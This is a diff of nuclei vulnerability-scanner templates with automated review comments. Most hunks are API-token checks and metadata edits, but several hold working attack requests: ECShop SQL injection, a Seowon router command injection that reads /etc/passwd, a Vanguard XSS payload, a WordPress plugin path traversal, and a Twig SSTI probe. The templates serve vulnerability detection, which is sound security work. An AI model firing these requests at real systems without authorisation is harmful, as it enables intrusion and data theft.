- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/IUCN.md
|
||||||
tags: token-spray,iucn
|
tags: token-spray,iucn
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: MyAnimeList API Test
|
name: MyAnimeList API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://myanimelist.net/apiconfig/references/api/v2
|
reference:
|
||||||
|
- https://myanimelist.net/apiconfig/references/api/v2
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Anime/MyAnimeList.md
|
||||||
tags: token-spray,myanimelist
|
tags: token-spray,myanimelist
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -0,0 +1,28 @@
|
||||||
|
id: api-nownodes
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Nownodes API Test
|
||||||
|
author: daffainfo
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://nownodes.io/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Nownodes.md
|
||||||
|
tags: token-spray,nownodes
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET https://bsc-blockbook.nownodes.io/api HTTP/1.1
|
||||||
|
Host: bsc-blockbook.nownodes.io
|
||||||
|
api-key: {{token}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"coin":'
|
||||||
|
- '"host":'
|
||||||
|
- '"version":'
|
||||||
|
condition: and
|
|
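Review bot: `Content-Type: application/json` is sent on a GET with no body, so the header does nothing and can be dropped from the raw request. The single word matcher has no status or negative companion, so telling a rejected key from an accepted one depends entirely on the error body lacking `"coin":`, `"host":` and `"version":`; adding `matchers-condition: and` with a `- type: status` / `- 200` matcher, as the etherscan template in this commit does, would make that explicit. Passing `{{token}}` in the `api-key` header rather than in the URL keeps the key out of request logs, which is the preferable of the two patterns used across this commit.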
@ -4,7 +4,9 @@ info:
|
||||||
name: Rijksmuseum API Test
|
name: Rijksmuseum API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://data.rijksmuseum.nl/user-generated-content/api/
|
reference:
|
||||||
|
- https://data.rijksmuseum.nl/user-generated-content/api/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md
|
||||||
tags: token-spray,rijksmuseum
|
tags: token-spray,rijksmuseum
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: TheCatApi API Test
|
name: TheCatApi API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://docs.thecatapi.com/
|
reference:
|
||||||
|
- https://docs.thecatapi.com/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md
|
||||||
tags: token-spray,thecatapi
|
tags: token-spray,thecatapi
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: api-thedogapi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: TheDogApi API Test
|
||||||
|
author: daffainfo
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://docs.thedogapi.com/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheDogApi.md
|
||||||
|
tags: token-spray,thedogapi
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.thedogapi.com/v1/votes"
|
||||||
|
headers:
|
||||||
|
x-api-key: "{{token}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'id":'
|
||||||
|
- 'image_id":'
|
||||||
|
- 'sub_id":'
|
||||||
|
condition: and
|
|
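Review bot: The words `'id":'`, `'image_id":'` and `'sub_id":'` are inconsistent with the `'"key":'` form used by every other token-spray template in this commit, and because `id":` is a substring of both `image_id":` and `sub_id":` the first word can never fail on its own; `- '"id":'` restores an independent check. Separately, if `/v1/votes` returns an empty array for a key that has cast no votes (the docs in the first reference should say), a valid key with no votes will never satisfy `condition: and` — an endpoint that always returns those fields for an authenticated key would be a more reliable probe.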
@ -4,7 +4,9 @@ info:
|
||||||
name: URLScan API Test
|
name: URLScan API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://urlscan.io/docs/api/
|
reference:
|
||||||
|
- https://urlscan.io/docs/api/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md
|
||||||
tags: token-spray,urlscan
|
tags: token-spray,urlscan
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: VirusTotal API Test
|
name: VirusTotal API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://developers.virustotal.com/reference#getting-started
|
reference:
|
||||||
|
- https://developers.virustotal.com/reference
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md
|
||||||
tags: token-spray,virustotal
|
tags: token-spray,virustotal
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: ecshop-sqli
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ecshop SQLi
|
||||||
|
author: Lark-lab,ImNightmaree
|
||||||
|
severity: high
|
||||||
|
reference:
|
||||||
|
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
|
||||||
|
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
|
||||||
|
tags: sqli,php,ecshop
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /user.php?act=login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'XPATH syntax error:'
|
||||||
|
- '[error] =>'
|
||||||
|
- '[0] => Array'
|
||||||
|
- 'MySQL server error report:Array'
|
||||||
|
condition: and
|
|
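Review bot: `info` has no `description`, unlike the other vulnerability templates in this commit, so a reader has to decode the serialized `Referer` payload to learn what is being tested. Something like `description: ECShop's user.php login handler unserializes the Referer header and uses its contents in a SQL query, allowing error-based SQL injection (2017).` is supported by the request and the XPATH-error matcher; the wording should be checked against the two references. The `words` matcher omits `part: body`, which nuclei defaults to, but spelling it out would match the style of the other templates in the commit.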
@ -0,0 +1,32 @@
|
||||||
|
id: seowon-router-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Seowon 130-SLC router - Remote Code Execution (Unauthenticated)
|
||||||
|
author: gy741
|
||||||
|
severity: critical
|
||||||
|
description: Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page
|
||||||
|
reference: https://www.exploit-db.com/exploits/50295
|
||||||
|
tags: rce,seowon,router,unauth
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Referer: {{BaseURL}}/diagnostic.html?t=201701020919
|
||||||
|
Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
|
||||||
|
Connection: keep-alive
|
||||||
|
|
||||||
|
Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
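Review bot: The `description` reads as copied usage instructions ("we only enter the router ip & Port … The result of the request is visible on the browser page") rather than a statement of the weakness, and it is a single run-on sentence. A rewording such as `description: The diagnostic page of the Seowon 130-SLC router passes the queriesCnt parameter to a shell without authentication, allowing arbitrary command execution as the admin user.` describes what the request at the bottom of the hunk actually exercises; affected versions should be confirmed from the exploit-db reference. The `sessionTime=` cookie value and `T=` form field are fixed timestamps carried over from the proof of concept; a short comment saying whether they must be current would save the next maintainer from guessing.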
@ -5,19 +5,21 @@ info:
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: high
|
severity: high
|
||||||
description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability.
|
description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability.
|
||||||
tags: php,ssti
|
tags: php,ssti,twig
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/search?search_key=%7B%7B1337*1338%7D%7D"
|
- "{{BaseURL}}/search?search_key=%7B%7B1337*1338%7D%7D"
|
||||||
|
|
||||||
|
skip-variables-check: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- "1788906"
|
- "1788906"
|
||||||
part: body
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 404
|
- 404
|
||||||
|
|
|
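Review bot: The added `skip-variables-check: true` has no comment explaining why it is needed, and the reason is not obvious because the only `{{…}}` in the request is the URL-encoded `%7B%7B1337*1338%7D%7D` probe. A comment above it such as `# the URL-encoded {{1337*1338}} probe would otherwise be rejected as an unresolved template variable` would make the intent clear; if that is not the reason, the line needs explaining even more. Moving `part: body` above `words` is fine, but the same ordering is not applied to the vanguard-post-xss template added in this commit, where `part: body` still trails `words`.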
@ -0,0 +1,34 @@
|
||||||
|
id: vanguard-post-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Vanguard Marketplace CMS ≤ 2.1
|
||||||
|
author: ImNightmaree
|
||||||
|
severity: medium
|
||||||
|
description: Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box
|
||||||
|
reference: https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html
|
||||||
|
tags: vanguard,xss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /search HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
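Review bot: `name: Vanguard Marketplace CMS ≤ 2.1` does not say what is being detected, and the `description` covers a stored XSS in messages and product titles that this template never exercises — the request only reflects the `phps_query` search field. `name: Vanguard Marketplace CMS <= 2.1 - Reflected Cross-Site Scripting` and a description limited to the search-box reflection would match the test, with the stored variants mentioned as untested. `part: body` sits after `words` in the first matcher while the twig-ssti hunk in this same commit moves it above, so the two should agree.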
@ -0,0 +1,27 @@
|
||||||
|
id: ad-widget-lfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0)
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
description: Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
|
||||||
|
reference:
|
||||||
|
- https://cxsecurity.com/issue/WLB-2017100084
|
||||||
|
- https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
|
||||||
|
tags: wordpress,wp-plugin,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
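Review bot: The `description` is generic boilerplate ("may allow an attacker to obtain sensitive information") and does not say where the inclusion is, while the request line shows it precisely: the `step` parameter of `views/modal/`. Something like `description: The ad-widget plugin's views/modal/ page includes the file named in the step parameter without restricting it to the plugin directory, allowing local files to be read.` is supported by the request; the plugins.trac changeset in the second reference looks like the fix and could be named as such once confirmed. The `%00` suffix relies on null-byte truncation that current PHP releases reject, so a missed match does not prove the plugin is patched — worth a comment on the `path` line. There is also a stray blank line between `matchers:` and `- type: regex`.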
@ -1,10 +1,10 @@
|
||||||
id: rdf-user-enumeration
|
id: wordpress-rdf-user-enum
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Wordpress RDF User Enumeration
|
name: Wordpress RDF User Enumeration
|
||||||
author: r3dg33k
|
author: r3dg33k
|
||||||
severity: info
|
severity: info
|
||||||
tags: wordpress
|
tags: wordpress,enum
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -36,4 +36,4 @@ requests:
|
||||||
part: body
|
part: body
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '<dc:creator><!\[CDATA\[([a-z]+)\]\]><\/dc:creator>'
|
- '<dc\:creator><\!\[CDATA\[(.*?)\]\]></dc'
|
|
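Review bot: The new regex `'<dc\:creator><\!\[CDATA\[(.*?)\]\]></dc'` escapes `:` and `!`, which are not metacharacters in Go's RE2 syntax, so the backslashes only obscure the pattern; `'<dc:creator><!\[CDATA\[(.*?)\]\]></dc'` is equivalent and reads as the XML it matches. Widening the capture from `([a-z]+)` to `(.*?)` is the substantive part of the change and deserves a one-line comment, presumably that usernames containing digits, dots or capitals are now extracted too. The `id` rename in the first hunk (`rdf-user-enumeration` to `wordpress-rdf-user-enum`) should be checked against any workflow that references the old id. The two hunks cover only parts of the file; the request block between them is outside the diff.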
@ -0,0 +1,10 @@
|
||||||
|
id: gocd-workflow
|
||||||
|
info:
|
||||||
|
name: GoCD Security Checks
|
||||||
|
author: dhiyaneshDk
|
||||||
|
description: A simple workflow that runs all GoCD Pipeline related nuclei templates on a given target.
|
||||||
|
|
||||||
|
workflows:
|
||||||
|
- template: exposed-panels/gocd-login.yaml
|
||||||
|
subtemplates:
|
||||||
|
- tags: gocd
|
|
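Review bot: `subtemplates: - tags: gocd` will re-run `exposed-panels/gocd-login.yaml` itself if that template carries the `gocd` tag, which its name suggests; in that case the login check runs twice per matched host, and listing the follow-up templates explicitly (or excluding the panel check) would avoid it. There is also no blank line between `id:` and `info:`, which every other template in this commit, including the sitecore workflow, has.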
@ -0,0 +1,13 @@
|
||||||
|
id: sitecore-workflow
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SiteCore Security Checks
|
||||||
|
author: pdteam
|
||||||
|
description: A simple workflow that runs all SiteCore related nuclei templates on a given target.
|
||||||
|
|
||||||
|
workflows:
|
||||||
|
- template: technologies/sitecore-default-page.yaml
|
||||||
|
- template: exposed-panels/sitecore-login.yaml
|
||||||
|
subtemplates:
|
||||||
|
- tags: vulnerabilities/sitecore-pre-auth-rce.yaml
|
||||||
|
- template: misconfiguration/sitecore-debug-page.yaml
|
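Review bot: `- tags: vulnerabilities/sitecore-pre-auth-rce.yaml` under `subtemplates` puts a file path where a tag is expected, so the entry will most likely match no template and the pre-auth RCE check is silently never run; the sibling entry shows the intended form, `- template: vulnerabilities/sitecore-pre-auth-rce.yaml`. The gocd-workflow file in this same commit uses `- tags:` with a plain tag value, which makes the slip easy to confirm. The subtemplates are attached only to the `sitecore-login.yaml` entry; if the debug-page and RCE checks should also follow a hit on `sitecore-default-page.yaml`, they need to be repeated under it.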